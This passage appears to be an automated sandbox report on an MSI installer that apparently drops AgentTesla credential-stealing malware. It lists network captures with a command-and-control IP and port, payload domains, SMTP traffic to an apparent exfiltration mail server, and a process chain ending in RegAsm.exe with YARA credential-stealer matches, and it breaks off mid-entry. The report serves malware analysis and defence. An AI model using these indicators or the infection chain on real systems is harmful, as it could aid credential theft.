Apr 1, 2021 17:47:06.048007011 CEST	6090	49927	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:06.548362970 CEST	49927	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:06.653526068 CEST	6090	49927	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:07.157707930 CEST	49927	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:07.265037060 CEST	6090	49927	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:07.377680063 CEST	49928	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:07.483911991 CEST	6090	49928	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:07.752490044 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:47:07.910723925 CEST	587	49859	192.185.29.233	192.168.2.3
Apr 1, 2021 17:47:07.910862923 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:47:07.911681890 CEST	49859	587	192.168.2.3	192.185.29.233
Apr 1, 2021 17:47:07.986476898 CEST	49928	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:08.093647957 CEST	6090	49928	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:08.595586061 CEST	49928	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:08.701567888 CEST	6090	49928	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:08.817573071 CEST	49929	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:08.922724962 CEST	6090	49929	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:09.423561096 CEST	49929	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:09.529557943 CEST	6090	49929	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:10.032951117 CEST	49929	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:10.141436100 CEST	6090	49929	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:10.253201008 CEST	49930	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:10.359240055 CEST	6090	49930	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:10.861140966 CEST	49930	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:10.968245029 CEST	6090	49930	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:11.470659018 CEST	49930	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:11.576559067 CEST	6090	49930	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:11.692497969 CEST	49931	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:11.801454067 CEST	6090	49931	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:12.314430952 CEST	49931	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:12.423043966 CEST	6090	49931	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:12.924401999 CEST	49931	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:13.035384893 CEST	6090	49931	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:13.145164013 CEST	49932	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:13.256822109 CEST	6090	49932	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:13.767632961 CEST	49932	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:13.876326084 CEST	6090	49932	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:14.377166033 CEST	49932	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:14.485531092 CEST	6090	49932	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:14.597758055 CEST	49933	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:14.704777956 CEST	6090	49933	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:15.220983028 CEST	49933	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:15.326781988 CEST	6090	49933	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:15.830581903 CEST	49933	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:15.938216925 CEST	6090	49933	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:16.053225040 CEST	49934	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:16.159687042 CEST	6090	49934	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:16.674124002 CEST	49934	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:16.779508114 CEST	6090	49934	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:17.283725023 CEST	49934	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:17.391289949 CEST	6090	49934	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:17.505503893 CEST	49935	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:17.612977028 CEST	6090	49935	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:18.127489090 CEST	49935	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:18.233593941 CEST	6090	49935	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:18.736866951 CEST	49935	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:18.842298985 CEST	6090	49935	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:18.957191944 CEST	49936	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:19.063169003 CEST	6090	49936	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:19.565009117 CEST	49936	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:19.672435045 CEST	6090	49936	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:20.174462080 CEST	49936	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:20.279846907 CEST	6090	49936	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:20.395606995 CEST	49937	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:20.500485897 CEST	6090	49937	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:21.002638102 CEST	49937	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:21.110512018 CEST	6090	49937	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:21.612009048 CEST	49937	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:21.719937086 CEST	6090	49937	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:21.834294081 CEST	49938	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:21.942327023 CEST	6090	49938	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:22.455881119 CEST	49938	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:22.561331034 CEST	6090	49938	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:23.065440893 CEST	49938	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:23.170902967 CEST	6090	49938	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:23.285350084 CEST	49939	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:23.394239902 CEST	6090	49939	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:23.909214020 CEST	49939	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:24.017729998 CEST	6090	49939	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:24.518860102 CEST	49939	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:24.627409935 CEST	6090	49939	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:24.739692926 CEST	49940	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:24.847995996 CEST	6090	49940	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:25.362329960 CEST	49940	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:25.470355034 CEST	6090	49940	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:25.971735954 CEST	49940	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:26.080298901 CEST	6090	49940	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:26.192744017 CEST	49941	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:26.298299074 CEST	6090	49941	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:26.800070047 CEST	49941	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:26.905711889 CEST	6090	49941	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:27.409579039 CEST	49941	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:27.516864061 CEST	6090	49941	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:27.630120039 CEST	49942	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:27.738943100 CEST	6090	49942	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:28.253254890 CEST	49942	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:28.361867905 CEST	6090	49942	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:28.862647057 CEST	49942	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:28.971781015 CEST	6090	49942	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:29.083570957 CEST	49943	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:29.191541910 CEST	6090	49943	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:29.706425905 CEST	49943	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:29.811224937 CEST	6090	49943	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:30.315865993 CEST	49943	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:30.423963070 CEST	6090	49943	79.134.225.109	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2021 17:40:54.681612968 CEST	56961	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:54.728085041 CEST	53	56961	8.8.8.8	192.168.2.3
Apr 1, 2021 17:40:55.434133053 CEST	59353	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:55.480043888 CEST	53	59353	8.8.8.8	192.168.2.3
Apr 1, 2021 17:40:56.364037037 CEST	52238	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:56.412902117 CEST	53	52238	8.8.8.8	192.168.2.3
Apr 1, 2021 17:40:57.132281065 CEST	49873	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:57.181199074 CEST	53	49873	8.8.8.8	192.168.2.3
Apr 1, 2021 17:40:58.508171082 CEST	53196	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:58.554151058 CEST	53	53196	8.8.8.8	192.168.2.3
Apr 1, 2021 17:40:59.554596901 CEST	56777	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:40:59.611610889 CEST	53	56777	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:00.321103096 CEST	58643	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:00.367177963 CEST	53	58643	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:01.109616041 CEST	60985	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:01.155704021 CEST	53	60985	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:02.342139959 CEST	50200	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:02.397600889 CEST	53	50200	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:03.145031929 CEST	51281	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:03.205540895 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:03.991528034 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:04.041446924 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:05.272898912 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:05.318784952 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:06.404881001 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:06.454246998 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:07.592952967 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:07.647455931 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:08.385468006 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:08.433434010 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:09.506490946 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:09.557544947 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:30.355621099 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:30.433521032 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:42.624744892 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:42.707492113 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 1, 2021 17:41:44.415851116 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:41:44.493001938 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 1, 2021 17:42:40.348656893 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:42:40.404747963 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 1, 2021 17:43:51.367896080 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:43:51.425173998 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:27.727314949 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:27.782030106 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:27.799576044 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:27.859695911 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:46.257344007 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:46.325444937 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:49.719156027 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:49.787081003 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:55.945377111 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:56.009629011 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 1, 2021 17:45:56.328938961 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 1, 2021 17:45:56.402312040 CEST	53	51352	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 1, 2021 17:41:42.624744892 CEST	192.168.2.3	8.8.8.8	0x5978	Standard query (0)	www.sogecoenergy.com	A (IP address)	IN (0x0001)
Apr 1, 2021 17:41:44.415851116 CEST	192.168.2.3	8.8.8.8	0x9676	Standard query (0)	mariotessarollo.com	A (IP address)	IN (0x0001)
Apr 1, 2021 17:42:40.348656893 CEST	192.168.2.3	8.8.8.8	0xed4e	Standard query (0)	mariotessarollo.com	A (IP address)	IN (0x0001)
Apr 1, 2021 17:43:51.367896080 CEST	192.168.2.3	8.8.8.8	0x4571	Standard query (0)	mariotessarollo.com	A (IP address)	IN (0x0001)
Apr 1, 2021 17:45:27.727314949 CEST	192.168.2.3	8.8.8.8	0xda67	Standard query (0)	mail.fibertech.ae	A (IP address)	IN (0x0001)
Apr 1, 2021 17:45:27.799576044 CEST	192.168.2.3	8.8.8.8	0x46e	Standard query (0)	mail.fibertech.ae	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 1, 2021 17:41:42.707492113 CEST	8.8.8.8	192.168.2.3	0x5978	No error (0)	www.sogecoenergy.com	sogecoenergy.com		CNAME (Canonical name)	IN (0x0001)
Apr 1, 2021 17:41:42.707492113 CEST	8.8.8.8	192.168.2.3	0x5978	No error (0)	sogecoenergy.com		116.203.34.79	A (IP address)	IN (0x0001)
Apr 1, 2021 17:41:44.493001938 CEST	8.8.8.8	192.168.2.3	0x9676	No error (0)	mariotessarollo.com		185.81.0.109	A (IP address)	IN (0x0001)
Apr 1, 2021 17:42:40.404747963 CEST	8.8.8.8	192.168.2.3	0xed4e	No error (0)	mariotessarollo.com		185.81.0.109	A (IP address)	IN (0x0001)
Apr 1, 2021 17:43:51.425173998 CEST	8.8.8.8	192.168.2.3	0x4571	No error (0)	mariotessarollo.com		185.81.0.109	A (IP address)	IN (0x0001)
Apr 1, 2021 17:45:27.782030106 CEST	8.8.8.8	192.168.2.3	0xda67	No error (0)	mail.fibertech.ae	fibertech.ae		CNAME (Canonical name)	IN (0x0001)
Apr 1, 2021 17:45:27.782030106 CEST	8.8.8.8	192.168.2.3	0xda67	No error (0)	fibertech.ae		192.185.29.233	A (IP address)	IN (0x0001)
Apr 1, 2021 17:45:27.859695911 CEST	8.8.8.8	192.168.2.3	0x46e	No error (0)	mail.fibertech.ae	fibertech.ae		CNAME (Canonical name)	IN (0x0001)
Apr 1, 2021 17:45:27.859695911 CEST	8.8.8.8	192.168.2.3	0x46e	No error (0)	fibertech.ae		192.185.29.233	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 1, 2021 17:41:42.880338907 CEST	116.203.34.79	443	192.168.2.3	49704	CN=sogecoenergy.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Feb 27 01:36:30 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri May 28 02:36:30 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:41:42.880338907 CEST	116.203.34.79	443	192.168.2.3	49704	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:41:44.617976904 CEST	185.81.0.109	443	192.168.2.3	49705	CN=mariotessarollo.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sun Mar 21 16:24:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sat Jun 19 17:24:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:41:44.617976904 CEST	185.81.0.109	443	192.168.2.3	49705	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:42:40.609774113 CEST	185.81.0.109	443	192.168.2.3	49743	CN=mariotessarollo.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sun Mar 21 16:24:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sat Jun 19 17:24:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:42:40.609774113 CEST	185.81.0.109	443	192.168.2.3	49743	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:43:51.659208059 CEST	185.81.0.109	443	192.168.2.3	49790	CN=mariotessarollo.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sun Mar 21 16:24:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sat Jun 19 17:24:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 1, 2021 17:43:51.659208059 CEST	185.81.0.109	443	192.168.2.3	49790	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 1, 2021 17:45:28.416682005 CEST	587	49855	192.185.29.233	192.168.2.3	220-brabus.websitewelcome.com ESMTP Exim 4.93 #2 Thu, 01 Apr 2021 10:45:28 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 1, 2021 17:45:28.420073032 CEST	49855	587	192.168.2.3	192.185.29.233	EHLO 494126
Apr 1, 2021 17:45:28.580080032 CEST	587	49855	192.185.29.233	192.168.2.3	250-brabus.websitewelcome.com Hello 494126 [84.17.52.79] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 1, 2021 17:45:28.580595016 CEST	49855	587	192.168.2.3	192.185.29.233	STARTTLS
Apr 1, 2021 17:45:28.745837927 CEST	587	49855	192.185.29.233	192.168.2.3	220 TLS go ahead
Apr 1, 2021 17:45:31.783608913 CEST	587	49859	192.185.29.233	192.168.2.3	220-brabus.websitewelcome.com ESMTP Exim 4.93 #2 Thu, 01 Apr 2021 10:45:31 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 1, 2021 17:45:31.783962965 CEST	49859	587	192.168.2.3	192.185.29.233	EHLO 494126
Apr 1, 2021 17:45:31.939624071 CEST	587	49859	192.185.29.233	192.168.2.3	250-brabus.websitewelcome.com Hello 494126 [84.17.52.79] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 1, 2021 17:45:31.940222025 CEST	49859	587	192.168.2.3	192.185.29.233	STARTTLS
Apr 1, 2021 17:45:32.099847078 CEST	587	49859	192.185.29.233	192.168.2.3	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exe PID: 3360 Parent PID: 5576

General

Start time:	17:40:59
Start date:	01/04/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\ot.msi'
Imagebase:	0x7ff763920000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSI7397.tmp PID: 4792 Parent PID: 1152

General

Start time:	17:41:01
Start date:	01/04/2021
Path:	C:\Windows\Installer\MSI7397.tmp
Wow64 process (32bit):	true
Commandline:	C:\Windows\Installer\MSI7397.tmp
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	287073F3D2C3100BA375B7BF0DB3B0D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ieinstal.exe PID: 4232 Parent PID: 4792

General

Start time:	17:41:28
Start date:	01/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Installer\MSI7397.tmp
Imagebase:	0x1220000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ota.exe PID: 4900 Parent PID: 4232

General

Start time:	17:41:43
Start date:	01/04/2021
Path:	C:\Users\user\AppData\Local\Temp\ota.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ota.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	F22F008D6287349195ADEF8975497D1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 1048 Parent PID: 4900

General

Start time:	17:42:28
Start date:	01/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\ota.exe'
Imagebase:	0x560000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5404 Parent PID: 1048

General

Start time:	17:42:28
Start date:	01/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: asparagussens.exe PID: 484 Parent PID: 3388

General

Start time:	17:42:51
Start date:	01/04/2021
Path:	C:\Users\user\Afkodedes8\asparagussens.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Afkodedes8\asparagussens.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	F22F008D6287349195ADEF8975497D1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: asparagussens.exe PID: 1180 Parent PID: 3388

General

Start time:	17:42:59
Start date:	01/04/2021
Path:	C:\Users\user\Afkodedes8\asparagussens.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Afkodedes8\asparagussens.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	F22F008D6287349195ADEF8975497D1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 4784 Parent PID: 484

General

Start time:	17:43:36
Start date:	01/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Afkodedes8\asparagussens.exe'
Imagebase:	0x350000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 4800 Parent PID: 484

General

Start time:	17:43:36
Start date:	01/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Afkodedes8\asparagussens.exe'
Imagebase:	0xb00000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1036 Parent PID: 4800

General

Start time:	17:43:37
Start date:	01/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 5612 Parent PID: 1180

General

Start time:	17:43:50
Start date:	01/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Afkodedes8\asparagussens.exe'
Imagebase:	0x700000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5008 Parent PID: 5612

General

Start time:	17:43:51
Start date:	01/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
